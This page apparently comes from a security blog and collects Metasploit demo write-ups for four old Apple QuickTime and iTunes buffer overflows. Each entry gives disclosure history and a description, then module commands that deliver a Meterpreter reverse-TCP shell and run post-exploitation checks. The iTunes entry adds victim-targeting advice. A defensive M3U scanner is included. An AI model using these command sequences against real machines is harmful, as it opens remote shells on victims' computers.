Posts tagged QuickTime
CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo
Timeline :
Vulnerability reported to the vendor by Arezou Hosseinzad-Amirkhizi
Coordinated public release of the vulnerability on 2012-11-05
Metasploit PoC provided by juan vazquez on 2012-11-22
PoC provided by :
Arezou Hosseinzad-Amirkhizi
juan vazquez
Reference(s) :
CVE-2012-3752
OSVDB-87087
BID-56557
HT5581
Affected version(s) :
QuickTime 7.7.2 and earlier for Windows
Tested on Windows XP Pro SP3 with :
QuickTime 7.7.2
Firefox 3.5.1
Description :
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is the field this module uses to trigger the overflow. Because of QuickTime restrictions when handling font-table fields, only bytes in the range 0x31-0x39 can be used to overflow, so at the moment no DEP/ASLR bypass has been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
Commands :
use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sessions -i 1
getuid
sysinfo
CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo
Timeline :
Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor on 2011-10-21
Coordinated public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-27
PoC provided by :
Alexander Gavrun
sinn3r
juan vazquez
Reference(s) :
CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222
Affected version(s) :
QuickTime 7.7.1 and earlier
Tested on Windows XP Pro SP3 with :
QuickTime 7.7.1
Description :
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly: user-supplied data is stored on the stack without a length check, which results in the overflow.
Commands :
use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j
sysinfo
getuid
Apple iTunes 10 Extended M3U Stack Buffer Overflow Vulnerability Metasploit Demo
Timeline :
Vulnerability fixed in the product, without any notice of the vulnerability, on 2012-06-11
Vulnerability discovered by Rh0
Public release of the vulnerability on 2012-06-20
Metasploit PoC provided on 2012-06-20
PoC provided by :
Rh0
sinn3r
Reference(s) :
EDB-ID-19322
HT5318
OSVDB-83220
Rh0
Affected version(s) :
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3
Tested on Windows XP Pro SP3 with :
Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56
Description :
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes copies the content after “#EXTINF:” from a heap buffer to a stack buffer without appropriate length checking, writing beyond the stack buffer’s boundary, which allows code execution in the context of the user. Please note that before using this exploit you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used remotely, you should be aware of the victim browser’s behavior when opening an itms link. For example, IE/Firefox/Opera by default ask the user for permission before launching the itms link in iTunes. Chrome asks for permission and also displays a warning. Safari would be an ideal target, because it opens the link without any user interaction.
Commands :
use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
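The iTunes bug above is a missing length check on the text that follows “#EXTINF:”. The following scanner, added here as an example (it is not Metasploit or Apple code), applies the check that iTunes lacked to extended M3U playlists, so a mail gateway or file-upload handler can flag oversized or malformed “#EXTINF:” lines before a user opens them. The MAX_EXTINF_BYTES threshold and the sample playlists are assumptions constructed for the example, not the real buffer size.

```python
"""Flag oversized or malformed #EXTINF lines in an extended M3U playlist."""
import re

# Assumed scanning threshold: a legitimate track title is far shorter than this.
# It is not the size of the iTunes stack buffer, which the page does not state.
MAX_EXTINF_BYTES = 512

# Extended M3U entry: "#EXTINF:<duration>,<title>", duration is an integer (-1 allowed)
_EXTINF_RE = re.compile(r"^#EXTINF:(-?\d+)\s*,(.*)$")


def scan_m3u(text):
    """Return a list of (line_no, reason) findings; an empty list means clean."""
    findings = []
    lines = text.splitlines()
    if not lines or lines[0].strip() != "#EXTM3U":
        findings.append((1, "missing #EXTM3U header"))
    for no, line in enumerate(lines, start=1):
        if not line.startswith("#EXTINF:"):
            continue
        # Everything after "#EXTINF:" is what iTunes copied unchecked onto the stack.
        payload = line[len("#EXTINF:"):]
        size = len(payload.encode("utf-8"))
        if size > MAX_EXTINF_BYTES:
            findings.append((no, "EXTINF payload of %d bytes exceeds %d"
                             % (size, MAX_EXTINF_BYTES)))
            continue
        if not _EXTINF_RE.match(line):
            findings.append((no, "malformed EXTINF (expected '<duration>,<title>')"))
    return findings


def is_suspicious(text):
    """True when the playlist has any finding worth quarantining."""
    return bool(scan_m3u(text))


# Constructed samples: a normal playlist and one with an oversized EXTINF line.
BENIGN = "#EXTM3U\n#EXTINF:123,Sample Artist - Sample Title\nhttp://example.invalid/a.mp3\n"
OVERSIZED = "#EXTM3U\n#EXTINF:" + "A" * 2000 + "\nhttp://example.invalid/a.mp3\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, scan_m3u(sample))
```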
CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo
Timeline :
Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to the vendor by ZDI on 2011-04-11
Coordinated public release of the vulnerability on 2011-08-08
Metasploit PoC provided on 2011-09-03
PoC provided by :
MC
Reference(s) :
Affected version(s) :
All Apple QuickTime Player versions prior to 7.7
Tested on Windows XP SP3 with :
Apple QuickTime Player 7.6 (472)
Description :
This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.
Commands :
use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
getuid
sysinfo